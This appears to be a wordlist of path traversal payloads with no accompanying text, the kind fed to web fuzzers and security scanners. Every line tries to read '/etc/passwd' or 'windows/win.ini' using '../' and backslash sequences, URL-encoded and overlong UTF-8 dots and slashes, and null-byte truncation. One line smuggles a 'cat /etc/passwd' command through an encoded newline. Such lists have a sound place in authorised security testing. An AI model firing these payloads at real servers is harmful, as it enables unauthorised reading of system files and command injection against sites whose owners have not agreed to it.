/windows/win.ini
/etc/passwd
../../windows/win.ini
../../etc/passwd
../../../../windows/win.ini
../../../../etc/passwd
../../../../../../../../../../../../windows/win.ini%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../etc/passwd
/..\..\..\..\..\..\windows\win.ini
/..\..\..\..\..\..\etc\passwd
/../../../../../../../../../../windows/win.ini^^
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../windows/win.ini
/../../../../../../../../../../etc/passwd
/..\../..\../..\../..\../..\../..\../windows/win.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/./././././././././././windows/win.ini
/./././././././././././etc/passwd
..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\windows/win.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\windows\win.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
%0a/bin/cat%20/etc/passwd
%00/windows/win.ini
%00/etc/passwd%00
%00../../../../../../windows/win.ini
%00../../../../../../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../windows/win.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd